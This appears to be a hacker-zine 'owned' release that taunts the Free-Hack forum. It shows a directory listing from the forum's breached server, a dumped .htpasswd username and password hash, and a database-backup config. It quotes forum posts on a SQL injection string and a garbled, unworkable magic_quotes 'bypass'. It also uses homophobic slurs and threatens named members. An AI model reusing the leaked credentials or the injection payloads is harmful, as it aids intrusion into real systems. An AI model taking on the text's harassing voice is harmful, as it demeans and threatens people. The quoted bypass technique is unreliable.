-rw-r--r-- 1 freehack freehack 1086 Dec 4 22:27 .htaccess
drwxr-xr-x 11 freehack freehack 4096 Nov 14 09:24 2tgh9322132k322l1sd
-rw-r--r-- 1 freehack freehack 6726 Jan 18 2010 LICENSE
drwxr-xr-x 2 freehack freehack 4096 Nov 14 07:11 _private
drwxr-xr-x 4 freehack freehack 4096 Nov 14 08:28 _vti_bin
drwxr-xr-x 2 freehack freehack 4096 Nov 14 07:11 _vti_cnf
drwxr-xr-x 2 freehack freehack 4096 Nov 14 07:11 _vti_log
drwxr-x--- 2 freehack nobody 4096 Nov 14 07:11 _vti_pvt
drwxr-xr-x 2 freehack freehack 4096 Nov 14 07:11 _vti_txt
-rw-r--r-- 1 freehack freehack 19341 Jan 18 2010 accessmask.php
-rw-r--r-- 1 freehack freehack 12687 Jan 18 2010 admin_rbs.php
-rw-r--r-- 1 freehack freehack 2645 Jan 18 2010 admin_rbs_banner_list.php
-rw-r--r-- 1 freehack freehack 3089 Jan 18 2010 admin_rbs_convert.php
-rw-r--r-- 1 freehack freehack 2667 Jan 18 2010 admin_rbs_d_banner_list.php
-rw-r--r-- 1 freehack freehack 2668 Jan 18 2010 admin_rbs_h_banner_list.php
-rw-r--r-- 1 freehack freehack 2668 Jan 18 2010 admin_rbs_v_banner_list.php
-rw-r--r-- 1 freehack freehack 2681 Jan 18 2010 admin_rbs_x_banner_list.php
-rw-r--r-- 1 freehack freehack 39582 Jan 18 2010 admincalendar.php
-rw-r--r-- 1 freehack freehack 49644 Jan 18 2010 admininfraction.php
-rw-r--r-- 1 freehack freehack 19150 Jan 18 2010 adminlog.php
-rw-r--r-- 1 freehack freehack 8149 Jan 18 2010 adminpermissions.php
-rw-r--r-- 1 freehack freehack 25516 Jan 18 2010 adminreputation.php
-rw-r--r-- 1 freehack freehack 1230 Jan 18 2010 ads.php
-rw-r--r-- 1 freehack freehack 23844 Jan 18 2010 ajax.php
-rw-r--r-- 1 freehack freehack 75511 Jan 18 2010 album.php
drwxrwxrwx 2 freehack freehack 4096 Nov 14 08:04 amecache
-rw-r--r-- 1 freehack freehack 17137 Jan 18 2010 announcement.php
drwxr-xr-x 2 freehack freehack 4096 Nov 14 08:04 archive
-rw-r--r-- 1 freehack freehack 18309 Jan 18 2010 attachment.php
-rw-r--r-- 1 freehack freehack 12512 Jan 18 2010 attachmentpermission.php
-rw-r--r-- 1 freehack freehack 80983 Jan 18 2010 automediaembed_admin.php
-rw-r--r-- 1 freehack freehack 1979 Jan 18 2010 autorefresh_footer.php
-rw-r--r-- 1 freehack freehack 1979 Jan 18 2010 autorefresh_header.php
-rw-r--r-- 1 freehack freehack 1991 Jan 18 2010 autorefresh_navbar.php
-rw-r--r-- 1 freehack freehack 1430 Jan 18 2010 autotagger_ajax.php
-rw-r--r-- 1 freehack freehack 19355 Jan 18 2010 avatar.php
-rw-r--r-- 1 freehack freehack 46771 Jan 18 2010 banner.png
-rw-r--r-- 1 freehack freehack 16461 Jan 18 2010 bbcode.php
drwxr-xr-x 6 freehack freehack 4096 Nov 14 08:06 bilder
drwxr-xr-x 8 freehack freehack 4096 Nov 25 14:18 blog
-rw-r--r-- 1 freehack freehack 14782 Jan 18 2010 bookmarksite.php
-rw-r--r-- 1 freehack freehack 75327 Jan 18 2010 calendar.php
-rw-r--r-- 1 freehack freehack 12083 Jan 18 2010 calendarpermission.php
drwxr-xr-x 2 freehack freehack 4096 Nov 14 07:11 cgi-bin
-rw-r--r-- 1 freehack freehack 43 Jan 18 2010 clear.gif
drwxr-xr-x 4 freehack freehack 4096 Nov 14 08:08 clientscript
drwxr-xr-x 2 freehack freehack 4096 Nov 14 08:08 control_examples
-rw-r--r-- 1 freehack freehack 14938 Jan 18 2010 converse.php
drwxr-xr-x 3 freehack freehack 4096 Nov 18 14:14 cpa
drwxr-xr-x 2 freehack freehack 4096 Nov 14 08:11 cpm
drwxr-xr-x 7 freehack freehack 4096 Nov 14 08:12 cpstyles
-rw-r--r-- 1 freehack freehack 3317 Jan 18 2010 cron.php
-rw-r--r-- 1 freehack freehack 24049 Jan 18 2010 cronadmin.php
-rw-r--r-- 1 freehack freehack 10734 Jan 18 2010 cronlog.php
-rw-r--r-- 1 freehack freehack 34087 Jan 18 2010 css.php
drwxrwxrwx 3 freehack freehack 4096 Nov 14 08:13 customavatars
drwxrwxrwx 3 freehack freehack 4096 Nov 14 08:13 customgroupicons
drwxrwxrwx 2 freehack freehack 4096 Nov 14 08:13 customprofilepics
-rw-r--r-- 1 freehack freehack 21833 Jan 18 2010 diagnostic.php
-rw-r--r-- 1 freehack freehack 47757 Jan 18 2010 editpost.php
-rw-r--r-- 1 freehack freehack 11748 Jan 18 2010 email.php
-rw-r--r-- 1 freehack freehack 29500 Jan 18 2010 external.php
-rw-r--r-- 1 freehack freehack 9786 Jan 18 2010 faq.php
-rw-r--r-- 1 freehack freehack 22486 Jan 18 2010 favicon.ico
-rw-r--r-- 1 freehack freehack 30137 Jan 18 2010 forum.php
-rw-r--r-- 1 freehack freehack 35658 Jan 18 2010 forumdisplay.php
-rw-r--r-- 1 freehack freehack 30063 Jan 18 2010 forumpermission.php
-rw-r--r-- 1 freehack freehack 15499 Oct 11 10:03 gla_test.php
-rw-r--r-- 1 freehack freehack 39830 Jan 18 2010 global.php
-rw-r--r-- 1 freehack freehack 53 Oct 24 14:48 googlef4001cc5b1db090b.html
-rw-r--r-- 1 freehack freehack 137885 Jan 18 2010 group.php
-rw-r--r-- 1 freehack freehack 24919 Jan 18 2010 group_inlinemod.php
-rw-r--r-- 1 freehack freehack 10524 Jan 18 2010 groupsubscription.php
-rw-r--r-- 1 freehack freehack 25922 Jan 18 2010 help.php
drwxr-xr-x 2 freehack freehack 4096 Nov 14 08:13 htaccess
-rw-r--r-- 1 freehack freehack 9047 Jan 18 2010 image.php
drwxr-xr-x 20 freehack freehack 4096 Nov 14 08:51 images
drwxr-xr-x 5 freehack freehack 4096 Nov 14 08:52 img
drwxr-xr-x 7 freehack freehack 12288 Dec 4 22:09 includes
-rw-r--r-- 1 freehack freehack 19592 Jan 18 2010 index.php
-rw-r--r-- 1 freehack freehack 43829 Jan 18 2010 infraction.php
-rw-r--r-- 1 freehack freehack 182759 Jan 18 2010 inlinemod.php
-rw-r--r-- 1 freehack freehack 10342 Jan 18 2010 joinrequests.php
-rw-r--r-- 1 freehack freehack 10222 Jan 18 2010 login.php
drwxr-xr-x 2 freehack freehack 4096 Nov 14 08:59 madp
-rw-r--r-- 1 freehack freehack 17066 Jan 18 2010 member.php
-rw-r--r-- 1 freehack freehack 15931 Jan 18 2010 member_inlinemod.php
-rw-r--r-- 1 freehack freehack 35901 Jan 18 2010 memberlist.php
-rw-r--r-- 1 freehack freehack 23867 Jan 18 2010 misc.php
-rw-r--r-- 1 freehack freehack 63331 Jan 18 2010 moderation.php
-rw-r--r-- 1 freehack freehack 6756 Jan 18 2010 moderator.php
-rw-r--r-- 1 freehack freehack 18477 Jan 18 2010 newattachment.php
-rw-r--r-- 1 freehack freehack 37104 Jan 18 2010 newreply.php
-rw-r--r-- 1 freehack freehack 18911 Jan 18 2010 newthread.php
-rw-r--r-- 1 freehack freehack 5725 Jan 18 2010 nex_stats_tend_classes.php
drwxr-xr-x 9 freehack freehack 4096 Nov 25 18:38 nopaste
-rw-r--r-- 1 freehack freehack 12095 Jul 20 15:01 oks.png
-rw-r--r-- 1 freehack freehack 19604 Jan 18 2010 online.php
-rw-r--r-- 1 freehack freehack 7696 Jan 18 2010 payment_gateway.php
-rw-r--r-- 1 freehack freehack 11910 Jan 18 2010 payments.php
-rw-r--r-- 1 freehack freehack 7889 Jan 18 2010 picture.php
-rw-r--r-- 1 freehack freehack 22040 Jan 18 2010 picture_inlinemod.php
-rw-r--r-- 1 freehack freehack 25311 Jan 18 2010 picturecomment.php
-rw-r--r-- 1 freehack freehack 27415 Jan 18 2010 poll.php
-rw-r--r-- 1 freehack freehack 17744 Jan 18 2010 post_thanks.php
-rw-r--r-- 1 freehack freehack 9512 Jan 18 2010 posthistory.php
-rw-r--r-- 1 freehack freehack 74369 Jan 18 2010 postings.php
-rw-r--r-- 1 freehack freehack 4763 Jan 18 2010 pprm.php
-rw-r--r-- 1 freehack freehack 6594 Jan 18 2010 printthread.php
-rw-r--r-- 1 freehack freehack 70748 Jan 18 2010 private.php
-rw-r--r-- 1 freehack freehack 152336 Jan 18 2010 profile.php
-rw-r--r-- 1 freehack freehack 2712 Feb 3 2010 rbs_banner.php
-rw-r--r-- 1 freehack freehack 39751 Jan 18 2010 register.php
-rw-r--r-- 1 freehack freehack 5688 Jan 18 2010 report.php
-rw-r--r-- 1 freehack freehack 13720 Jan 18 2010 reputation.php
-rw-r--r-- 1 freehack freehack 124717 Jan 18 2010 search.php
-rw-r--r-- 1 freehack freehack 20694 Jan 18 2010 sendmessage.php
-rw-r--r-- 1 freehack freehack 10009 Jan 18 2010 showgroups.php
-rw-r--r-- 1 freehack freehack 11374 Jan 18 2010 showpost.php
-rw-r--r-- 1 freehack freehack 73470 Jan 18 2010 showthread.php
drwxrwxrwx 2 freehack freehack 4096 Nov 14 08:59 signaturepics
drwxr-xr-x 2 freehack freehack 4096 Nov 14 08:59 sitemap
-rw-r--r-- 1 freehack freehack 32848 Jan 18 2010 subscription.php
-rw-r--r-- 1 freehack freehack 51471 Sep 11 14:10 support.php
-rw-r--r-- 1 freehack freehack 13365 Jan 18 2010 tags.php
-rw-r--r-- 1 freehack freehack 8692 Jan 18 2010 threadrate.php
-rw-r--r-- 1 freehack freehack 12415 Jan 18 2010 threadtag.php
drwxrwxrwx 2 freehack freehack 4096 Dec 8 03:30 tmp
-rw-r--r-- 1 freehack freehack 34512 Jan 18 2010 usercp.php
-rw-r--r-- 1 freehack freehack 19098 Jan 18 2010 usernote.php
drwxrwxrwx 7 freehack freehack 4096 Nov 14 09:06 vboptimise
drwxr-xr-x 4 freehack freehack 4096 Dec 4 22:11 vbseo
-rw-r--r-- 1 freehack freehack 45172 Sep 14 01:00 vbseo.php
drwxr-xr-x 4 freehack freehack 4096 Nov 14 09:14 vbseo_sitemap
-rw-r--r-- 1 freehack freehack 4221 Sep 14 01:00 vbseocp.php
-rw-r--r-- 1 freehack freehack 27357 Jan 18 2010 visitormessage.php
-rw-r--r-- 1 freehack freehack 8431 Jan 18 2010 whoquotedme.php
-rw-r--r-- 1 freehack freehack 334 Oct 7 11:32 x.php

RETARDED PHP CODE ALERT!
$ cat x.php
$ cd 2tgh9322132k322l1sd
$ ls
total 252
drwxr-xr-x 11 508 504 4096 Nov 14 09:24 .
drwxr-x--- 34 508 99 4096 Dec 4 22:13 ..
-rw-r--r-- 1 508 504 129 Nov 14 09:24 .htaccess
-rw-r--r-- 1 508 504 42 Nov 14 09:24 .htpasswd
drwxr-xr-x 2 508 504 4096 Nov 14 07:22 ReadMe
-rw-r--r-- 1 508 504 3661 Nov 14 09:20 config.php
-rw-r--r-- 1 508 504 58442 Sep 22 2009 config_overview.php
drwxr-xr-x 4 508 504 4096 Nov 14 07:16 css
-rw-r--r-- 1 508 504 19372 Sep 22 2009 dump.php
-rw-r--r-- 1 508 504 512 Nov 14 09:20 error_log
-rw-r--r-- 1 508 504 22059 Sep 22 2009 filemanagement.php
-rw-r--r-- 1 508 504 640 Sep 22 2009 help.php
drwxr-xr-x 2 508 504 4096 Nov 14 07:17 images
drwxr-xr-x 4 508 504 4096 Nov 14 07:18 inc
-rw-r--r-- 1 508 504 871 Sep 22 2009 index.php
-rw-r--r-- 1 508 504 24781 Sep 22 2009 install.php
drwxr-xr-x 4 508 504 4096 Nov 14 07:18 js
drwxr-xr-x 17 508 504 4096 Nov 14 07:22 language
-rw-r--r-- 1 508 504 5461 Sep 22 2009 log.php
-rw-r--r-- 1 508 504 1256 Sep 22 2009 main.php
-rw-r--r-- 1 508 504 3930 Sep 22 2009 menu.php
drwxr-xr-x 2 508 504 4096 Nov 14 07:22 msd_cron
-rw-r--r-- 1 508 504 776 Sep 22 2009 refresh_dblist.php
-rw-r--r-- 1 508 504 15762 Sep 22 2009 restore.php
-rw-r--r-- 1 508 504 10187 Sep 22 2009 sql.php
drwxr-xr-x 5 508 504 4096 Nov 14 07:22 tpl
drwxrwxrwx 5 508 504 4096 Nov 14 09:20 work
$ cat .htpasswd
Suicide:$1$GTs9Hns/$lPMGV.EaLgyqwNxgTQSwf1
$ cat config.php
1000
$config['processlist_refresh']=3000;
$config['empty_db_before_restore']=0;
$config['optimize_tables_beforedump']=1;
$config['stop_with_error']=1;
// For sending a mail after backup set send_mail to 1, otherless set to 0
$config['send_mail']=0;
// Attach the backup 0=no 1=yes
$config['send_mail_dump']=0;
// set the recieve adress for the mail
$config['email_recipient']='';
$config['email_recipient_cc']='';
// set the sender adress (the script)
$config['email_sender']='';
//max. Size of Email-Attach, here 3 MB
$config['email_maxsize1']=3;
$config['email_maxsize2']=2;
// FTP Server Configuration for Transfer
$config['ftp_transfer'][0]=0;
$config['ftp_timeout'][0]=30;
$config['ftp_useSSL'][0]=0;
$config['ftp_mode'][0]=0;
$config['ftp_server'][0]=''; // Adress of FTP-Server
$config['ftp_port'][0]='21'; // Port
$config['ftp_user'][0]=''; // Username
$config['ftp_pass'][0]=''; // Password
$config['ftp_dir'][0]=''; // Upload-Directory
$config['ftp_transfer'][1]=0;
$config['ftp_timeout'][1]=30;
$config['ftp_useSSL'][1]=0;
$config['ftp_mode'][1]=0;
$config['ftp_server'][1]='';
$config['ftp_port'][1]='21';
$config['ftp_user'][1]='';
$config['ftp_pass'][1]='';
$config['ftp_dir'][1]='';
$config['ftp_transfer'][2]=0;
$config['ftp_timeout'][2]=30;
$config['ftp_useSSL'][2]=0;
$config['ftp_mode'][2]=0;
$config['ftp_server'][2]='';
$config['ftp_port'][2]='21';
$config['ftp_user'][2]='';
$config['ftp_pass'][2]='';
$config['ftp_dir'][2]='';
//Multipart 0=off 1=on
$config['multi_part']=0;
$config['multipartgroesse1']=1;
$config['multipartgroesse2']=2;
$config['multipart_groesse']=0;
//Auto-Delete 0=off 1=on
$config['auto_delete']=0;
$config['max_backup_files']=3;
//configuration file
$config['cron_configurationfile']='mysqldumper.conf.php';
//path to perl, for windows use e.g. C:perlbinperl.exe
$config['cron_perlpath']='/usr/bin/perl';
//mailer use sendmail(1) or SMTP(0)
$config['cron_use_sendmail']=1;
//path to sendmail
$sendmail_path=ini_get('sendmail_path');
$config['cron_sendmail']=$sendmail_path>'' ? $sendmail_path: '/usr/lib/sendmail -t -oi -oem';
//adress of smtp-server
$config['cron_smtp']='localhost';
//smtp-port
$config['cron_smtp_port']=25;
$config['cron_extender']=0;
$config['cron_compression']=1;
$config['cron_printout']=1;
$config['cron_completelog']=1;
$config['cron_comment']='';
$config['multi_dump']=0;
$config['logcompression']=1;
$config['log_maxsize1']=1;
$config['log_maxsize2']=2;
$config['log_maxsize']=1048576;

FREE-HACK LIST OF LAME

We think that novaca!ne's magic_quotes bypass is quite representative for this group:

--snip snip--
Bypass magic_quotes (novaca!ne)

magic_quotes is a php setting (php.ini). It causes every ' (single-quote), " (double quote) and \ (backslash) to be escaped with a backslash automatically, a weak but well-known securing method.

This is how to bypass it: Use the function called „String.fromCharCode()“, you need to translate your MySQL command into ASCII (http://www.asciizeichen.de/tabelle.html) and put it input into the handling.

‘ OR ‘a’ = ‘a
equals
String.fromCharCode(8216, 32, 79, 82, 32, 8216, 97, 8217, 32, 61, 32, 8216, 97)
--snip snip--

novaca!ne is (next to fred777) of course, our new security superhero! Congratz, faggot...

Finally we shouldn't forget our old fag superhero fred777, who helped us to understand how we could get every source code of a page. This sounds pretty hard, but fred777 shows his priv8 techniques (we fear them):

--snip snip--
#########################################################
# Sourcecode disclosure by social engineering
# tested on NPD
#########################################################

Intro:
I'll describe a case here that I had in front of me recently. By chance I was once again on the many NPD sites, looking for vulnerabilities. On one subpage I did find something, or at least it looked as if there was an SQL injection there. As soon as the limit parameter was passed incorrectly, the usual SQL error appeared:
---------------------------------------------------------
Logically, the query looked like this:
SELECT `cats` FROM fred (sonstiges) LIMIT $_GET['la'],10;
When I then tried to extend the query with UNION using a script, it would not work. Sure, there could be quite a few reasons for that, but I would have loved to look at the source and the queries.
---------------------------------------------------------
Why not, actually? After some consideration, I wrote a mail to the webmaster of the site, with the aim of getting him to send me the source.
--snip snip--

What we learned is:
- If we write an email to an admin we always get the source code
- fred777 uses tools to exploit some sql injection

"o_O", one of the banned users puts it nicely: "being lame is one of fred777's master skills"

Just to inform you: We owned Free-Hack with this technique of course.

TIME FOR SOME
[ASCII art banner on a background of repeated "slap"]

Right, who deserves it? Correct! Suicide and enco for being badass super high skilled computer professionals ... NOT

This is a warning Free-Hack. Continue existing and we will show no mercy. Especially you, J0hn.X3r. Take your chance, go and grow up.
~ last words ~

That's all for now. We hope that those we have owned understood the warning and that those who already enjoyed issue one were satisfied with this release. We will take a little break for now and go to Hawaii to get our asses drunk. But do not fear. There will always be enough time for us to audit more code, write more 0day and own more idiots. We will always watch the scene and act if we are needed. There is still a lot to do and the winter of hax is not over yet. So do expect us.

- the happy ninjas

~ OUTRO ~

And shepherds we shall be, for thee my Lord for thee, power hath descended forth from thy hand, that our feet may swiftly carry out thy command. We shall flow a river forth to thee, and teeming with souls shall it ever be. In nomine patris, et filii, et spiritus sancti

© Offensive Security 2010